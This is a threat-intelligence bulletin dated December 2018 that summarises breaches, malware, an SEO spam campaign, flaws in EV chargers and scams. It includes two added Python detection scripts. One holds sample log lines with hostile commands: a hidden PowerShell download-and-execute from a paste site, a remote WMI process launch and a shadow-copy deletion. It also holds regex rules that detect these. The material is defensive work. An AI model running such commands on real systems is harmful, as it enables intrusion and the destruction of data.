
Cyware Daily Threat Intelligence December 18, 2018


Top Breach Incidents Reported in the Last 24 Hours


University of Vermont Health Network breached
The University of Vermont Health Network – Elizabethtown Community Hospital recently suffered a data breach after one employee's email account was remotely accessed by an unauthorized user. 32,000 potentially affected patients are being notified. The breach did not involve the hospital's computer networks or electronic medical records. PII and limited medical data, including Social Security Numbers, were compromised.

Twitter data breach
Another Twitter data leak occurred recently. Experts suspect that Twitter's support form was targeted by state-sponsored actors. The bug that caused the leak was fixed the day after the attack was discovered. The leaked data contained the country codes of the phone numbers linked to users' accounts.

WSJ site defaced
Recently, a page on the popular Wall Street Journal website was hacked and replaced with a message appearing to support the YouTuber PewDiePie and his quest to achieve the largest subscriber count on YouTube. Experts are not sure whether PewDiePie personally endorsed the hack or whether it was merely the work of his supporters.

Top Malware Incidents Reported in the Last 24 Hours


URSNIF, EMOTET, DRIDEX, and BitPaymer linked
Security researchers recently found that the URSNIF, EMOTET, DRIDEX, and BitPaymer banking Trojans are linked by a similar loader. The same loaders were found to be associated with all of these malware families, and the payload decryption procedure and the loaders' internal data structures were strikingly similar across them.

Fileless GandCrab
A fileless variant of the GandCrab ransomware has been found abusing default Windows tools, such as PowerShell and WMI, for malicious activity. This includes moving laterally to other machines without writing any artifacts or history to disk. Attackers using this variant were able to log in remotely to machines whose RDP ports were open and publicly accessible. PowerShell is used to download raw text from Pastebin[.]com and execute it. After encryption, the Windows shadow copy backups are deleted.
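The behaviours described above (PowerShell fetching raw text from a paste site and executing it in memory, WMI used to start processes on other hosts, and shadow copies being deleted) each leave a trace in command-line or script-block logging even when nothing is written to disk. The following is an added detection example, not code from the original Cyware briefing: it scores constructed, SIEM-style command-line events against a small rule set and flags hosts whose combined score crosses a threshold. The event format, the rule weights and the threshold are assumptions chosen for illustration.

```python
import re
from collections import defaultdict

# Constructed sample events (not from the page): a simplified "host= user= cmd="
# normalisation of PowerShell script-block and process-creation logs.
SAMPLE_EVENTS = [
    "host=WS01 user=alice cmd=powershell.exe -Command Get-ChildItem C:\\Users",
    "host=WS02 user=svc cmd=powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')",
    'host=WS02 user=svc cmd=wmic.exe /node:WS03 process call create "powershell -enc AAAA"',
    "host=WS02 user=svc cmd=vssadmin.exe delete shadows /all /quiet",
    "host=WS04 user=bob cmd=powershell.exe -Command Invoke-WmiMethod -Class Win32_Process "
    "-Name Create -ArgumentList 'notepad.exe' -ComputerName WS05",
]

EVENT_RE = re.compile(r"^host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

# (name, weight, pattern). Weights are assumed values; tune them to your environment.
RULES = (
    # Raw script fetched from a paste site (the download stage described in the text)
    ("paste_site_download", 3, re.compile(r"(?i)pastebin\.com/raw")),
    # Downloaded text executed in memory instead of from a file on disk
    ("in_memory_exec", 2, re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
    # Evasive PowerShell launch options commonly paired with the above
    ("hidden_powershell", 1, re.compile(
        r"(?i)powershell(\.exe)?\s.*(-w(indowstyle)?\s+hidden|-nop\b|-enc(odedcommand)?\b)")),
    # WMI used to create a process on a remote host (lateral movement)
    ("wmi_remote_process", 3, re.compile(
        r"(?i)(wmic(\.exe)?\s+/node:|Invoke-WmiMethod\b.*Win32_Process.*-ComputerName)")),
    # Shadow copies removed, the post-encryption step described in the text
    ("shadow_copy_deletion", 4, re.compile(r"(?i)vssadmin(\.exe)?\s+delete\s+shadows")),
)


def score_event(line):
    """Return (host, matched rule names, score) for one normalised event line."""
    m = EVENT_RE.match(line)
    if not m:
        return None, [], 0
    cmd = m.group("cmd")
    matched = [name for name, _, pat in RULES if pat.search(cmd)]
    score = sum(weight for name, weight, _ in RULES if name in matched)
    return m.group("host"), matched, score


def triage(events):
    """Aggregate per-host scores and the distinct indicators seen on each host."""
    hosts = defaultdict(lambda: {"score": 0, "indicators": set()})
    for line in events:
        host, matched, score = score_event(line)
        if host is None or not matched:
            continue
        hosts[host]["score"] += score
        hosts[host]["indicators"].update(matched)
    return dict(hosts)


def flagged_hosts(events, threshold=5):
    """Hosts whose accumulated score reaches the (assumed) threshold, sorted by name."""
    return sorted(h for h, info in triage(events).items() if info["score"] >= threshold)


if __name__ == "__main__":
    for host, info in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, info["score"], sorted(info["indicators"]))
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

A single indicator such as a remote WMI process creation (WS04 in the sample) stays below the threshold on its own, since administrators do use WMI remotely; the chain of paste-site download, in-memory execution, remote WMI and shadow-copy deletion on WS02 is what lifts it over the line. In practice the input would be Sysmon event ID 1 or PowerShell event ID 4104 records rather than the constructed lines above.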

Top Vulnerabilities Reported in the Last 24 Hours


SEO spam campaign
Researchers have recently unearthed an SEO spam injection technique in which the spam is appended to the site's source code right after the closing HTML tag. The campaign is believed to have compromised 173 sites so far. The malware associated with it adds hidden links for search engines to index and intercepts requests to the site, redirecting visitors to spam content. Fake backup tables are created in the database to store the spam posts and data about logged-in visitors.
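Two of the traits described above, spam appended after the closing HTML tag and links hidden from human visitors but visible to crawlers, can be checked for directly in a site's rendered output. The following scanner is an added example, not part of the original Cyware briefing: it reports any non-whitespace content placed after the last `</html>` and any `<a>` tag nested inside an element whose inline style hides it. The sample pages are constructed, and the set of "hiding" CSS patterns is an assumption that a real deployment would extend.

```python
import re
from html.parser import HTMLParser

# Inline-style fragments that hide an element from human visitors (assumed list).
HIDDEN_STYLE = re.compile(
    r"(?i)display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0\b|left\s*:\s*-\d{3,}px")
CLOSING_HTML = re.compile(r"(?i)</html\s*>")
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "source"}


def trailing_payload(html):
    """Return any non-whitespace content after the last closing </html> tag, else ''."""
    matches = list(CLOSING_HTML.finditer(html))
    if not matches:
        return ""
    return html[matches[-1].end():].strip()


class HiddenLinkFinder(HTMLParser):
    """Collect href values of <a> tags that sit inside a hidden ancestor element."""

    def __init__(self):
        super().__init__()
        self.stack = []          # (tag, is_hidden) for open, non-void elements
        self.hidden_depth = 0    # number of currently open hidden ancestors
        self.hidden_links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = bool(HIDDEN_STYLE.search(attrs.get("style") or ""))
        if tag == "a" and (self.hidden_depth or hidden):
            self.hidden_links.append(attrs.get("href") or "")
        if tag in VOID_TAGS:
            return               # void elements never get an end tag; keep the stack clean
        self.stack.append((tag, hidden))
        if hidden:
            self.hidden_depth += 1

    def handle_startendtag(self, tag, attrs):
        # <br/> style self-closing tags open nothing, so they do not affect hidden depth
        pass

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        # Pop until the matching open tag; tolerates unclosed children in sloppy markup
        while self.stack:
            open_tag, hidden = self.stack.pop()
            if hidden:
                self.hidden_depth -= 1
            if open_tag == tag:
                break


def scan_page(html):
    """Report SEO-spam traits: content after </html> and links inside hidden elements."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    finder.close()
    return {"trailing_payload": trailing_payload(html), "hidden_links": finder.hidden_links}


# Constructed sample pages (not taken from any real site).
CLEAN_PAGE = "<html><body><p>Hello</p><a href='/about'>About</a><br></body></html>\n"
INJECTED_PAGE = (
    "<html><body><p>Hello</p></body></html>\n"
    '<div style="display:none"><a href="http://spam.example/pills">cheap pills</a>'
    '<a href="http://spam.example/loans">loans</a></div>'
)
INLINE_HIDDEN_PAGE = (
    '<html><body><img style="display:none" src="x.png">'
    '<a href="/visible">ok</a>'
    '<span style="position:absolute;left:-9999px"><a href="http://spam.example/x">x</a></span>'
    "</body></html>"
)

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE),
                       ("inline", INLINE_HIDDEN_PAGE)]:
        print(name, scan_page(page))
```

The parser tracks hidden state by ancestry rather than by the anchor's own style because the campaign described hides whole blocks of links, and it skips void elements such as `<img>` so that a hidden image does not make its following siblings look hidden. Run `scan_page` over periodic fetches of each public page and alert when either field changes from empty to non-empty.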

Flaws in Electric Vehicle Charging stations
Electric vehicle charging stations have been found vulnerable to an attack that could allow an attacker to compromise a station remotely and prevent a car from charging. The flaws are present in chargers supplied by the majority of electric vehicle vendors. The attack can bypass authentication and connect to the victim's smartphone via Bluetooth. It then sets the Wi-Fi parameters for an internet connection and finishes the registration by sending a newly created user ID and GPS coordinates.

Top Scams Reported in the Last 24 Hours


‘Three Questions Quiz’ scam
Recently, the 'Three Questions Quiz' scam has been used in many phishing campaigns. The fake quizzes are customized to the brand they impersonate, and each quiz starts with free questions about that brand. The scam also tends to use language that creates a sense of urgency among users, and phoney social media profiles are employed to lend it credence.

Galveston County data theft
Scammers have stolen $500,000 from Galveston County. Two officials have been asked to resign after being held responsible for the theft. As of now, the scammers have not been caught and the stolen funds have not been recovered. A fake email address was used to pose as both a county employee and a representative of the Lucas construction company. A form obtained from the county's website was then used to request a change to the bank account information for the road contractor, and the county was asked to make the payment via electronic transfer instead of a paper check.

Tags

ursnif
bitpaymer
emotet
twitter inc
galveston county
dridex

Posted on: December 18, 2018
